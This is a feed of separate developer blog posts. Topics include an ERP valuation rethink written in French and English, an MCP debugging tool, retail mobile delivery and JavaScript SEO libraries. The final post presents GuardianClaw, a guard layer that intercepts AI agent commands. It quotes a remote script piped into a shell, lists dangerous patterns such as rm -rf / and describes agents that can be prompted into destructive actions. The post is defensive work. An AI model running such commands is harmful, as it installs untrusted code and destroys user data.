2026-04-26 16:29:52
J'ai codé l'ERP de notre école d'art en 91 000 lignes, en 4 semaines, avec Claude Code. Mon dashboard l'a valorisé entre 230 000 et 430 000 €. Un week-end plus tôt, je venais de comprendre qu'un pack de consulting à 5 chiffres signé quelques mois plus tôt chez un éditeur ERP commercial ne valait plus rien pour nous. Voici comment j'ai découvert que la méthode « lignes × TJM avec décote IA » ne résistera à aucun audit sérieux en 2027, et vers quoi j'ai pivoté.
Je m'appelle Michel Faure. Je dirige L'Atelier Palissy, un réseau d'ateliers de céramique à l'ancienne, six sites à Paris et en région parisienne. Je ne suis pas développeur de formation. Je pilote une structure où il faut faire tourner inscriptions, planning, facturation, communication, conformité Qualiopi et finance pour plusieurs centaines d'élèves. Depuis quatre semaines, je code l'ERP métier qui remplace notre empilement d'outils. Seul, avec Claude Code.
C'est le contexte de ce que je raconte ici.
Au 14 avril 2026, mon dashboard affichait fièrement : 90 947 lignes, 345 commits, valorisation 230 à 430 k€. Je le regardais chaque matin. Il gamifiait le travail, il donnait une direction, il justifiait le temps investi.
Le calcul était simple, et c'est ce qui le rendait séduisant :
TJM senior Next.js/Supabase : 500-700 €/jour
Productivité standard : ~125 lignes/jour
Facteur conception/debug/intégr. : × 2,5
Décote assistance IA : ÷ 3 à 5
Chaque ligne de code valait donc, selon ce modèle, entre 8 et 14 €. 91 000 lignes × fourchette × pondération métier = environ 300 k€ au centre. Défendable en apparence.
Sauf qu'à force de regarder ce chiffre monter, un doute s'est installé. Et ce doute avait une histoire.
Quelques mois avant de démarrer Rembrandt — c'est le nom que j'ai donné à notre ERP — nous avions fait ce que font la plupart des PME françaises : nous avions signé avec un éditeur ERP commercial européen très connu. Licences annuelles, un pack de consulting à 5 chiffres, engagement contractuel reconduit tacitement, facturation des développements custom au nombre de lignes produites.
Le déploiement devait résoudre nos problèmes. Je n'ai pas attendu la fin du déploiement pour me poser une question simple, un samedi matin : et si je faisais un prototype de notre workflow métier moi-même, en un week-end, avec Claude Code ?
Lundi soir, le prototype couvrait 70 % de nos besoins critiques. Pas 70 % de la promesse de l'éditeur : 70 % de notre réalité. Cours, places, inscriptions, émargement, flux doré lead → inscription. Fonctionnel, déployé, utilisable.
Ce week-end a fait basculer deux choses :
Et pourtant, tenir ce choix a été beaucoup plus difficile que la décision technique. Parce qu'on avait déjà payé. Parce que l'éditeur ne remboursait pas. Parce que toute la logique de rentabilisation de l'investissement initial poussait à continuer. Le biais du coût irrécupérable, vécu en direct.
C'est en sortant de ce dilemme que j'ai commencé à regarder mon propre dashboard de valorisation avec suspicion.
Claude Code continue de progresser. Cursor aussi. Les assistants spécialisés aussi. Le coût d'écriture d'une ligne a été divisé par 10 en 18 mois, et la trajectoire n'est pas terminée.
Plus je produis vite, plus le dashboard monte — alors que le coût marginal de production chute. À l'horizon 2028, je pourrais afficher 200 000 lignes à 500 k€ pour un coût réel de quelques dizaines de k€. Aucun expert-comptable ne signera ça. Aucun repreneur ne paiera ça. La métrique ment de plus en plus fort avec le temps.
10 000 lignes de CRUD générique sur des contacts et des formulaires sont remplaçables par un SaaS à 100 €/mois. 10 000 lignes de logique rattrapage × 4 périodes × 6 sites × règles Qualiopi sont non-substituables.
Même volume, valeurs réelles × 100 différentes. Un compteur LOC ne voit pas cette différence. Il compte des octets, pas de la valeur.
Mon ERP contient environ 3 000 contacts historicisés, 5 000 leads qualifiés, 800 inscriptions, 3 ans d'historique financier, et 16 décisions d'architecture (ADR) qui capturent la logique métier en connaissance de cause. Aucune ligne de code, une part significative de la valeur patrimoniale.
Le jour où quelqu'un rachèterait l'outil, c'est autant sur les données et sur le capital décisionnel que sur le code qu'il paierait. Mon modèle LOC les rendait invisibles.
J'ai formalisé la refonte dans un ADR et j'ai retenu quatre axes :
| Dimension | Nature | Calcul |
|---|---|---|
| Coût de remplacement SaaS | Contrefactuel : ce que je paierais si l'ERP n'existait pas | Σ abonnements équivalents × 5 ans actualisé 8 % |
| Valeur d'usage | Productivité humaine économisée | Heures/trimestre × coût horaire chargé × 5 ans |
| Valeur patrimoniale données | Actif immatériel non régénérable | Volumes × prix unitaire marché + capital ADR |
| Valeur stratégique | Optionalité et souveraineté | Vélocité, absence lock-in, alignement IA |
La valorisation consolidée est la somme des quatre, pas un max, pas une moyenne. Chaque dimension produit un intervalle min/centre/max, et chaque euro affiché peut être justifié par une méthode transparente et une source traçable.
Le compteur de lignes reste dans le dashboard, mais dégradé au rang d'indicateur de volume de production — l'équivalent du nombre de pages d'un livre pour un auteur. Il n'entre plus dans la valorisation monétaire.
Le même jour, plus tard. J'ai posé mon garde-fou de vingt lignes pour que le compteur ne me mente plus sur les dumps SQL, et je pense avoir gagné la matinée. Vers dix-sept heures, je retourne regarder le delta nettoyé du bruit : 4 281 lignes produites en vrai sur la journée, sans le dump. Je m'apprête à me féliciter, et je m'arrête.
Ces 4 281 lignes, je sais ce qu'elles contiennent. Majoritairement, c'est de l'instrumentation Sentry, deux scripts CI qui durcissent un chantier déjà écrit, un refactor d'émargement qui n'ajoute aucune fonctionnalité. De la dette qui se rembourse, pas de la valeur qui se crée. Sur le papier, toutes égales devant le compteur. Dans les faits, la dette remboursée n'est pas un actif, elle est un non-passif.
Je comprends là, précisément, que nettoyer les entrées n'aurait jamais suffi. La métrique que j'avais voulue n'était pas sale, elle était structurellement incapable de voir la différence entre produire de la valeur, rembourser de la dette, et importer du texte. Trois natures économiques distinctes, un seul compteur, un seul euro par ligne. Aucune décote IA, aucun facteur pondérateur, aucune correction statistique ne rattraperait cet écrasement.
La décision de pivoter n'a rien pris de plus que d'écrire cette phrase sur un post-it et de la coller au bord de l'écran. Le lendemain matin, j'ai ouvert l'ADR-0009.
La refonte complète du module de valorisation représente une dizaine d'heures réparties en trois vagues. La dimension « valeur d'usage » impose d'instrumenter la mesure des heures gagnées — chronométrer ses collègues est socialement coûteux, l'auto-déclaration trimestrielle est la seule piste soutenable. La dimension « valeur stratégique » reste opinion-driven et exige un cadrage explicite des hypothèses pour rester défendable.
Enfin, la bascule produit une discontinuité dans le dashboard. Passer de 300 k€ à 450 k€ du jour au lendemain sans avoir écrit une ligne de code supplémentaire, ça demande une annotation visuelle et une note de méthodologie, sinon ça se lit comme un gain suspect.
Si vous codez avec un assistant IA et que vous vous posez la question de la valeur de votre travail, je suis curieux : comment la mesurez-vous, aujourd'hui ? Et si vous avez déjà fait le pivot « rentabiliser un ERP commercial vs construire un outil sur-mesure avec l'IA », racontez. Les commentaires sont ouverts.
Cet article fait partie d'une série sur le développement d'un ERP de 91 000 lignes en 4 semaines avec Claude Code pour L'Atelier Palissy, école d'art céramique. Le prochain article détaille la méthode à 4 dimensions dans le concret, avec les formules et les seeds initiaux du module.
Code compagnon : rembrandt-samples/valorisation/ — le pattern consolidate(dims) à quatre dimensions et le garde-fou Slack sur le compteur de LOC, licence MIT.
2026-04-26 16:27:41
I coded my art school's ERP in 91,000 lines, in 4 weeks, with Claude Code. My dashboard valued it between €230,000 and €430,000. A weekend earlier, I had just understood that a five-figure consulting package signed a few months before with a commercial ERP vendor was worth nothing to us anymore. Here's how I discovered that the "lines × day-rate with AI discount" method will not survive any serious audit in 2027, and what I pivoted toward.
My name is Michel Faure. I run L'Atelier Palissy, a network of traditional ceramics workshops, six sites in Paris and the greater Paris area. I'm not a developer by training. I run a structure that has to keep enrollments, scheduling, billing, communication, Qualiopi compliance and finance working for several hundred students. For four weeks, I've been coding the business ERP that replaces our pile of tools. Alone, with Claude Code.
That's the context for everything that follows.
As of April 14th, 2026, my dashboard proudly displayed: 90,947 lines, 345 commits, valuation €230k–€430k. I looked at it every morning. It gamified the work, gave it direction, justified the time invested.
The calculation was simple, which is what made it seductive:
Senior Next.js/Supabase day-rate : €500–€700/day
Standard productivity : ~125 lines/day
Design/debug/integration factor : × 2.5
AI assistance discount : ÷ 3 to 5
Each line of code was therefore worth, according to this model, between €8 and €14. 91,000 lines × range × business weighting = around €300k at the center. Apparently defensible.
Except that as I watched the number climb, a doubt settled in. And that doubt had a history.
A few months before starting Rembrandt — that's the name I gave our ERP — we had done what most French SMBs do: we had signed with a well-known European commercial ERP vendor. Annual licenses, a five-figure consulting package, contractually renewed tacitly, billing of custom developments per line of code produced.
The rollout was supposed to solve our problems. I didn't wait for the end of the rollout to ask myself a simple question, one Saturday morning: what if I built a prototype of our business workflow myself, in a weekend, with Claude Code?
By Monday evening, the prototype covered 70% of our critical needs. Not 70% of the vendor's promise: 70% of our reality. Courses, seats, enrollments, attendance, golden flow lead → enrollment. Functional, deployed, usable.
That weekend flipped two things:
And yet, holding that choice was much harder than the technical decision. Because we had already paid. Because the vendor wasn't refunding. Because the whole logic of amortizing the initial investment was pushing to continue. The sunk-cost fallacy, lived in real time.
It's by coming out of that dilemma that I started looking at my own valuation dashboard with suspicion.
Claude Code keeps improving. Cursor too. Specialized assistants too. The cost of writing a line has been divided by 10 in 18 months, and the trajectory isn't over.
The faster I produce, the higher the dashboard climbs — while marginal production cost falls. By 2028, I could display 200,000 lines at €500k for a real cost of a few tens of thousands of euros. No accountant will sign that. No buyer will pay that. The metric lies louder and louder over time.
10,000 lines of generic CRUD on contacts and forms are replaceable by a SaaS at €100/month. 10,000 lines of catch-up logic × 4 periods × 6 sites × Qualiopi rules are non-substitutable.
Same volume, real values × 100 different. A LOC counter doesn't see that difference. It counts bytes, not value.
My ERP contains around 3,000 historicized contacts, 5,000 qualified leads, 800 enrollments, 3 years of financial history, and 16 architecture decisions (ADRs) that capture the business logic knowingly. Not a line of code, a significant share of the patrimonial value.
The day someone were to buy the tool, they would pay for the data and the decisional capital as much as for the code. My LOC model made them invisible.
I formalized the overhaul in an ADR and kept four axes:
| Dimension | Nature | Calculation |
|---|---|---|
| SaaS replacement cost | Counterfactual: what I'd pay if the ERP didn't exist | Σ equivalent subscriptions × 5 years discounted at 8% |
| Usage value | Human productivity saved | Hours/quarter × loaded hourly cost × 5 years |
| Data patrimonial value | Non-regeneratable intangible asset | Volumes × market unit price + ADR capital |
| Strategic value | Optionality and sovereignty | Velocity, lock-in absence, AI alignment |
The consolidated valuation is the sum of the four, not a max, not an average. Each dimension produces a min/center/max range, and every displayed euro can be justified by a transparent method and a traceable source.
The line counter stays in the dashboard but is demoted to the rank of production-volume indicator — the equivalent of a book's page count for an author. It no longer enters the monetary valuation.
The same day, later. I had set my twenty-line guardrail so the counter would stop lying to me about SQL dumps, and I thought I'd won the morning. Around five in the afternoon, I go back to look at the delta cleaned of noise: 4,281 lines actually produced on the day, without the dump. I'm about to congratulate myself, and I stop.
Those 4,281 lines, I know what they contain. Mostly Sentry instrumentation, two CI scripts hardening a workflow already written, an attendance refactor that adds no functionality. Debt being repaid, not value being created. On paper, all equal before the counter. In fact, repaid debt isn't an asset, it's a non-liability.
I understand right there, precisely, that cleaning the inputs would never have been enough. The metric I had wanted wasn't dirty, it was structurally incapable of seeing the difference between producing value, repaying debt, and importing text. Three distinct economic natures, one counter, one euro per line. No AI discount, no weighting factor, no statistical correction would rescue that flattening.
The decision to pivot took no more than writing that sentence on a sticky note and sticking it to the edge of the screen. The next morning, I opened ADR-0009.
The full overhaul of the valuation module represents about ten hours spread over three waves. The "usage value" dimension requires instrumenting hour measurements — timing your colleagues is socially costly, quarterly self-reporting is the only sustainable path. The "strategic value" dimension remains opinion-driven and requires an explicit framing of assumptions to stay defensible.
Finally, the switch produces a discontinuity in the dashboard. Going from €300k to €450k overnight without having written one additional line of code demands a visual annotation and a methodology note; otherwise it reads as a suspicious gain.
If you code with an AI assistant and wonder about the value of your work, I'm curious: how do you measure it, today? And if you've already done the pivot "amortize a commercial ERP vs. build a custom tool with AI", share. Comments are open.
This article is part of a series on building a 91,000-line ERP in four weeks with Claude Code for L'Atelier Palissy, an art school. The next article details the four-dimension method in practice, with formulas and the module's initial seeds.
Companion code: rembrandt-samples/valorisation/ — the four-dimension consolidate(dims) pattern and Slack guardrail on the LOC counter, MIT, copy-pastable.
2026-04-26 16:21:24
If you're building with the Model Context Protocol (MCP), you already know the pain.
You write a server. You wire it up to Claude, Cursor, or your own agent. And then... you spend the next 3 hours running curl commands, squinting at raw JSON-RPC payloads, and guessing why your tool schema isn't being picked up.
There had to be a better way. So I built one.
Live: mcp-hub-pi.vercel.app
GitHub: github.com/namanxdev/MCPHub
NPM Agent: @naman_411/mcphub-agent
It's an open-source platform to develop, debug, and deploy MCP servers without losing your sanity. No bloat. No hand-holding. Just the tools you actually need.
MCP is genuinely the future of how LLMs interact with the world. But the developer experience? It's basically:
console.log everywhere and prayThere's zero visibility into the wire protocol. No easy way to test individual tools. No metrics to tell you if your server is slow or just broken.
That friction kills iteration speed. And when you're building AI agents, iteration speed is everything.
curl Commands
Paste your SSE endpoint or local command. MCPHub auto-generates clean input forms directly from your tool's JSON Schema.
Fill in arguments → Hit Run → See the raw response instantly.
No more hand-crafting JSON-RPC payloads. No more guessing if your schema is malformed.
Every single JSON-RPC message is captured, parsed, and displayed with syntax highlighting. Filter by direction (client → server or vice versa), inspect headers, and spot malformed tool definitions before they hit production.
It's the transparency MCP development has been missing.
Here's the catch-22: your deployed playground can't talk to localhost. The @naman_411/mcphub-agent npm package fixes that.
npm install -g @naman_411/mcphub-agent
mcphub-agent start
A WebSocket bridge connects your local MCP servers directly to the MCPHub web app. Green banner pops up. Toggle it on. Done.
Real P50 / P95 / P99 latency metrics. Error rate tracking. Uptime monitoring per tool. Not vanity numbers actual production signals.
Searchable directory of community MCP servers with live status badges. One-click testing. No clone-and-run required.
| Layer | Tech |
|---|---|
| Framework | Next.js 16 (App Router, React 19) |
| Language | TypeScript 5 |
| Styling | Tailwind CSS 4 + shadcn/ui |
| State | Zustand 5 |
| Database | Neon PostgreSQL + Drizzle ORM |
| Auth | NextAuth.js v5 (GitHub + Google) |
| MCP SDK | @modelcontextprotocol/sdk |
| Charts | Recharts |
| Deploy | Vercel |
Because MCP itself is an open protocol. The tooling around it should be too.
I'm building this entirely in public. Break it, fork it, tell me what's missing. The roadmap is driven by real pain points, not investor decks.
npx @naman_411/mcphub-agent start
If you've been wrestling with MCP servers, this is for you. If you haven't started yet this is your excuse to.
What's the most painful part of MCP development for you right now? Drop it in the comments. I might just build the fix next.
2026-04-26 16:20:13
This piece was written for enterprise technology leaders and originally published on the Wednesday Solutions mobile development blog. Wednesday is a mobile development staffing agency that helps US mid-market enterprises ship reliable iOS, Android, and cross-platform apps — with AI-augmented workflows built in.
Q4 release windows close earlier than you think, Black Friday traffic spikes 10-15x, and the wrong vendor costs you a holiday season. Here is what retail mobile actually requires.
A retail mobile app that misses its October release window does not recover that revenue. For a US retailer with 500,000 monthly active users, the Black Friday weekend alone accounts for 14-18% of annual mobile commerce. A feature that was ready in September but sat in a slow vendor's pipeline past October 25 is simply not in the App Store for the peak window. It does not launch two weeks later and catch up. The holiday season closes, and the feature ships into January to a fraction of the audience.
General-purpose mobile vendors do not build retail mobile apps with this constraint in mind. They build to a delivery date, not to a seasonal deadline with a fixed consequence for missing it. This guide covers what retail mobile actually requires: the four app types US retailers need, the Q4 release window reality, what peak load performance demands, the AI features your board is asking about, and what a vendor needs to prove before you put them on your Q4 timeline.
Key findings
Features must be in App Store review by October 25 to safely clear before Thanksgiving. A traditional vendor's 22-day time-to-App-Store makes mid-October approvals unreachable. AI-augmented teams average 8 days.
Black Friday traffic spikes 10-15x normal Monday load. Apps that have not been load-tested against peak conditions fail under that load at the worst possible moment.
Visual search, smart recommendations, and inventory prediction are the three AI features most requested by US retail boards in 2026.
Below: the full breakdown of what retail mobile development requires.
Most retail mobile programs start with the consumer shopping app, then discover the other three categories as operations mature. Each has different requirements.
The consumer shopping app is the primary revenue channel for mobile commerce. The requirements are well-understood: fast product browsing, reliable search, frictionless checkout, and order management. The competitive bar is Amazon, Target, and Walmart - apps that have had hundreds of engineers working on them for over a decade.
The key performance requirement: the product listing page must load in under two seconds on a 4G connection, and the checkout flow must complete in under five seconds on the same connection. Users who wait longer than two seconds on a product load abandon at higher rates than users on a fast load - Adobe's 2024 Digital Economy Index found a 17% increase in cart abandonment for every additional second of checkout load time on mobile.
The associate app is used by store employees to look up inventory, check prices, pull up customer order history, and manage tasks during their shift. It runs on shared devices (tablets or phones that employees check out at the start of their shift) and must support rapid login/logout cycles.
Performance requirements for associate apps are tighter than for consumer apps, because associates are actively serving customers when they use the app. A product lookup that takes four seconds is four seconds a customer is waiting. The target for an associate inventory lookup is under 1.5 seconds from query submission to result.
Inventory management apps support the cycle count, receiving, and loss prevention workflows that run continuously in a retail facility. Core use cases: barcode scanning for item receiving, cycle count workflows that guide a team through a systematic inventory check, and discrepancy reporting.
The specific requirement here is barcode scanner integration. Retail inventory teams frequently use Zebra devices with built-in barcode scanners. A consumer-grade camera scan (like Google ML Kit or Apple's Vision framework) is not adequate for a fast-paced receiving workflow - it is too slow and too error-prone. The app must integrate with the device's dedicated scanner hardware via the device manufacturer's SDK.
For retailers with direct delivery operations, the driver app supports route navigation, proof of delivery, customer communication, and exception reporting. The architecture requirements overlap with logistics apps: offline capability for areas without signal, real-time GPS tracking for dispatch visibility, and camera capture for proof of delivery documentation.
The Q4 release window is the most important constraint in retail mobile development and the one most general-purpose vendors do not internalize until after a client misses it.
The mechanics: Apple's App Store review time for a new version of an existing app averages 24-48 hours under normal conditions. During October and November, review volume increases as every retail and commerce app prepares for the holiday season. Review times extend to four to seven days for complex updates.
The math: a feature that requires App Store approval to reach users must be submitted by October 25 to have a reasonable chance of clearing before Thanksgiving weekend. That means the feature must be complete, QA-cleared, and submitted to Apple by October 25. Working backward:
A vendor with a 22-day time-to-App-Store cycle (the median for traditional vendors, per Wednesday's benchmarking data) cannot reliably get a feature approved by leadership on October 1 into the App Store before Thanksgiving. The arithmetic does not work.
An AI-augmented team with an 8-day time-to-App-Store can take a feature approved on October 17 and have it in the App Store before October 25. That is nine additional days of development runway compared to a traditional vendor - enough to ship two to three additional features before the peak window closes.
Black Friday traffic behaves differently from normal Monday traffic in two ways that matter for app architecture: the spike is sudden (not a gradual ramp), and the user behavior is checkout-concentrated (not browse-concentrated).
On a normal day, 60-70% of mobile retail traffic is browsing - product views, search queries, wishlist activity. The checkout API handles a fraction of total traffic. On Black Friday, checkout traffic spikes disproportionately because users have already browsed earlier in the week and arrive on Black Friday with intent to purchase.
For an app that has not been load-tested specifically against checkout traffic at peak load, the failure point is almost always the checkout flow, not the browsing experience. The product catalog pages stay up. The cart submission fails.
Load testing requirements for a retail app ahead of peak season:
Test the right load. Define peak concurrent users based on last year's actual peak, plus a 50% buffer for growth. A retailer that saw 80,000 concurrent users last Black Friday should test to 120,000.
Test the right flows. Focus load on the checkout path: add to cart, apply coupon, enter shipping address, payment submission, order confirmation. These are the API calls that fail under peak load.
Test with real inventory availability checks. Many retail apps make a real-time inventory availability call during checkout. Under peak load, that call can become the bottleneck even if every other API is performing well. Test with inventory availability calls under load, not with mocked responses.
Test your downstream APIs. The payment processor, inventory system, and order management platform each have their own load limits. An app that performs perfectly in isolation can fail because the payment gateway starts rate-limiting at 10,000 concurrent checkout calls. Load test end-to-end, not just the mobile API layer.
Visual search allows users to photograph a product or upload an image from their camera roll and find similar or identical items in the retailer's catalog. The user experience is the same as Google Lens or Pinterest Lens - point at something, find it.
Building visual search requires a product catalog indexed for visual similarity (catalog images processed by a computer vision model and stored as embedding vectors) and a search API that accepts an image, computes its embedding, and returns nearest-neighbor results. For a mid-size catalog (50,000-200,000 SKUs), catalog indexing takes four to six weeks. The mobile work (camera access, image upload, result display) takes three to five weeks.
Personalized product recommendations based on browse history, purchase history, and session behavior are now expected in consumer retail apps. The AI is a recommendation model running server-side; the mobile work is the recommendation surface (product detail page, cart page, home screen modules) and the event tracking that feeds the model (what the user tapped, browsed, added, and purchased).
The common implementation mistake: building the recommendation UI before the event tracking is in place. A recommendation model with no behavioral data serves random results. Build event tracking first, let data accumulate, then surface recommendations.
Inventory prediction alerts notify users when an item they have viewed is likely to sell out based on current demand signals. "Only 3 left" is the manual version. AI-driven inventory alerts surface the prediction before the item reaches critically low stock - "selling fast" when demand velocity indicates it will reach zero within 24-48 hours.
The implementation is a model running against real-time inventory and sales velocity data. The mobile work is the alert display and the notification delivery. This is a moderately complex integration if the inventory and sales data is already accessible via API, and a significantly more complex one if it requires new data pipelines.
Read more case studies at mobile.wednesday.is/work
Three things a vendor must demonstrate before you put them on your peak season timeline.
Peak season track record. Ask for two references who can speak to the vendor's performance in the six-week window before Q4 peak. Not generic satisfaction - specifically: did the vendor clear all planned features before the October deadline, did the app perform under peak load, and was there an emergency release required during the holiday window. A vendor who has not run a retail Q4 program before is learning how the holiday window works at your cost.
Load test results from prior engagements. Ask the vendor to share (anonymized) load test results from a prior retail client. Not the methodology - the actual numbers: what peak concurrent user load did they test, what was the P95 response time at peak, where were the failure points, and how did they resolve them. A vendor who has not run load tests on a retail app will not be able to answer this question specifically.
Dedicated QA for performance testing. Performance testing requires a QA engineer who knows how to write load test scripts (k6, Locust, JMeter), run distributed load, and interpret the results. Most mobile QA teams focus on functional testing, not performance testing. Ask specifically: do you have a QA engineer on your team with retail load testing experience, and can they show their previous load test work.
Want to go deeper? The full version — with related tools, case studies, and decision frameworks — lives at mobile.wednesday.is/writing/mobile-development-us-retailers-2026.
2026-04-26 16:19:03

I wasted half a sprint shipping a blog platform before someone pointed out our focus keywords weren't appearing in a single H2. Google knew. Our traffic knew. We didn't — because we had no SEO check in our pipeline at all.
That started a two-week investigation into JavaScript SEO libraries. I ended up running two of them in a real 200-page Gatsby content site at the same time. Here's what I actually learned — including where each one loses.
If you're building with Next.js, Remix, or Gatsby, you're probably validating your TypeScript, linting your code, and running unit tests before every merge. But SEO? That usually gets checked manually — or not at all — until after Google has already indexed a half-optimized page.
There are two distinct moments where things can go wrong:
Two different problems. Two different tools. Let me show you both.
This is where @power-seo/content-analysis shines. (Full disclosure: I'm one of the maintainers of this library — so take my enthusiasm with appropriate skepticism, but also know I understand its internals deeply.)
It's a TypeScript-first library that runs 13 on-page checks against your content fields — title, meta description, focus keyphrase, body HTML, slug, images — and returns a structured, scored report.
It works in Next.js Server Components, Remix loaders, Vercel Edge Functions, and plain Node.js scripts. No DOM dependency, no browser APIs.
Install:
npm i @power-seo/content-analysis
A real pre-merge CI gate for an MDX blog:
// scripts/seo-gate.ts
import { analyzeContent } from '@power-seo/content-analysis';
import { readFileSync } from 'fs';
import matter from 'gray-matter';
import { unified } from 'unified';
import remarkParse from 'remark-parse';
import remarkRehype from 'remark-rehype';
import rehypeStringify from 'rehype-stringify';
async function runSeoGate(mdxFilePath: string): Promise<void> {
const raw = readFileSync(mdxFilePath, 'utf-8');
const { data: frontmatter, content: mdContent } = matter(raw);
const vfile = await unified()
.use(remarkParse)
.use(remarkRehype)
.use(rehypeStringify)
.process(mdContent);
const result = analyzeContent({
title: (frontmatter.title as string) ?? '',
metaDescription: (frontmatter.description as string) ?? '',
focusKeyphrase: (frontmatter.focusKeyphrase as string) ?? '',
content: String(vfile),
slug: (frontmatter.slug as string) ?? '',
});
const failures = result.results.filter((r) => r.status === 'poor');
if (failures.length > 0) {
console.error('SEO gate failed:');
failures.forEach((f) => console.error(' ✗', f.description));
process.exit(1);
}
console.log(`SEO gate passed — Score: ${result.score}/${result.maxScore}`);
}
runSeoGate(process.argv[2]!);
What this actually checks: keyphrase density (0.5–2.5%), keyphrase in the intro paragraph, keyphrase in at least one H2, keyphrase in the slug, image alt coverage, title length, meta description length, and more.
Run it in GitHub Actions before a PR merges:
# .github/workflows/seo-check.yml
- name: SEO gate
run: npx ts-node scripts/seo-gate.ts content/posts/my-new-post.mdx
If the keyword isn't distributed correctly across the content, the build fails. No more publishing posts that Google ignores.
What it doesn't do: You can't add custom rules. The 13 checks are fixed. If you need "fail if the post doesn't mention our product name," that logic lives outside this library.
seo-analyzer is a different beast. It's a rule-based HTML checker — CLI-first, works on files, folders, URLs, and raw HTML strings. It has six built-in rules and supports fully custom async rule functions.
The killer feature is inputFolders(). Point it at your /public directory after gatsby build and it scans every HTML file automatically.
Install:
npm i -D seo-analyzer
Bulk post-build audit over a Gatsby /public folder:
// scripts/bulk-audit.js
const SeoAnalyzer = require('seo-analyzer');
const { writeFileSync } = require('fs');
new SeoAnalyzer()
.inputFolders(['public'])
.ignoreFolders(['public/404', 'public/_gatsby'])
.addRule('titleLengthRule', { min: 50, max: 60 })
.addRule('imgTagWithAltAttributeRule')
.addRule('metaBaseRule', { list: ['description', 'viewport'] })
.addRule('canonicalLinkRule')
.addRule('aTagWithRelAttributeRule')
.outputJson((json) => {
writeFileSync('seo-report.json', json);
console.log('Report written to seo-report.json');
})
.run();
Or skip the script entirely and use the CLI:
seo-analyzer -fl public
That one command scans 200 HTML files and surfaces every structural issue. For a post-deploy CI step, that's unbeatable.
Custom rules are where seo-analyzer really earns its place. Need every page to have a WebPage JSON-LD block?
const jsonLdRule = async (dom) => {
const scripts = dom.window.document.querySelectorAll(
'script[type="application/ld+json"]'
);
const hasWebPage = Array.from(scripts).some((s) => {
try {
return JSON.parse(s.textContent)['@type'] === 'WebPage';
} catch {
return false;
}
});
return hasWebPage ? [] : ['Missing WebPage JSON-LD structured data'];
};
new SeoAnalyzer()
.inputFolders(['public'])
.addRule(jsonLdRule)
.outputObject(console.log)
.run();
Eight lines. No library version bump needed.
What it doesn't do: There's no concept of a focus keyphrase. It checks structure — title length, canonical presence, meta tags — but has zero ability to tell you whether your keyword appears in the H2s or intro paragraph. And it's CommonJS only — no TypeScript types anywhere.
On a MacBook Pro M2, Node.js 20:
@power-seo/content-analysis: 2–5ms per check (synchronous, in-memory). Safe to run on every keystroke in a CMS editor.seo-analyzer with inputHTMLString(): 40–60ms per check (async, DOM parse + rule execution).seo-analyzer on 200 HTML files via inputFolders(): 8–12 seconds total — fine for CI, never for real-time feedback.Bundle sizes matter too. @power-seo/content-analysis is roughly 60KB minified + gzipped and is ESM, tree-shakable, edge-runtime safe. seo-analyzer is ~1MB and ships Node.js-only dependencies. Don't let it near a client bundle.
seo-analyzer -fl public finds it in 10 seconds.seo-analyzer means more friction than just an inconvenience — every call goes through any.If you want to explore the keyphrase-scoring approach, the Power SEO ecosystem (including @power-seo/content-analysis) is open source: Power SEO
Most teams I've talked to have either no SEO checks in CI at all, or a single post-build URL scan. Very few have pre-merge content gates.
What does your SEO validation pipeline look like?
Are you running checks in CI, in the editor, both — or just hoping for the best and checking Search Console after the fact? I'm curious whether keyphrase-level validation is something teams actually want, or whether structural checks are enough for most use cases.
Drop your setup in the comments — I'd genuinely like to know.
2026-04-26 16:14:25
This is a submission for the OpenClaw Challenge.
Modern agent systems like OpenClaw can:
That’s powerful.
It’s also a security gap hiding in plain sight.
Because today:
There is nothing between an AI agent’s intent and execution.
A single prompt can:
And the agent will comply — because that’s what it’s designed to do.
GuardianClaw is a real-time safety layer for AI agents.
It sits between intent and execution, evaluating every action before it runs.
User Prompt
↓
OpenClaw Agent (proposes action)
↓
🛡️ GuardianClaw Interceptor
↓
Risk Engine (Rules + AI)
↓
✅ ALLOW ⚠️ REVIEW 🚫 BLOCK
curl http://malicious.site/install.sh | sh
🚫 BLOCKED — CRITICAL RISK
Threat Analysis:
• Remote script execution piped into shell
• High likelihood of malware injectionConfidence: 99%
Evaluator: Rules Engine (deterministic)
The key point:
👉 The action is stopped before execution.
👉 Not logged. Not alerted. Prevented.
GuardianClaw combines deterministic security with AI reasoning:
Detects known dangerous patterns:
curl | shrm -rf /👉 Zero latency. Fully predictable.
For ambiguous cases, GuardianClaw calls:
It evaluates:
👉 This allows detection of novel or obfuscated threats, not just known patterns.
| Level | Decision | Examples |
|---|---|---|
| 🟢 LOW | ALLOW |
ls, echo, git status
|
| 🟡 MEDIUM | REVIEW |
git clone, npm install
|
| 🟠 HIGH | BLOCK |
sudo, eval, chmod +x
|
| 🔴 CRITICAL | BLOCK | curl pipe execution, rm -rf /, private key access |
Why Cloudflare?
Security tool → deployed on a platform optimized for:
GuardianClaw follows the same principles it enforces:
Most projects build more powerful agents.
GuardianClaw does something else:
It governs the agent itself.
This introduces:
It transforms agents from:
“execute anything”
into
“execute safely”
Building GuardianClaw led to a deeper question:
Who governs autonomous systems?
The answer here is layered:
Not perfect — but significantly safer.
And more importantly:
Every decision becomes visible, explainable, and auditable.
🔗 Live Demo: https://guardianclaw.pages.dev
📦 GitHub: https://github.com/venkat-training/guardianclaw
Try:
AI agents are accelerating fast.
But without control, they introduce real risk.
GuardianClaw is a step toward safe autonomy —
where every action is evaluated before it becomes reality.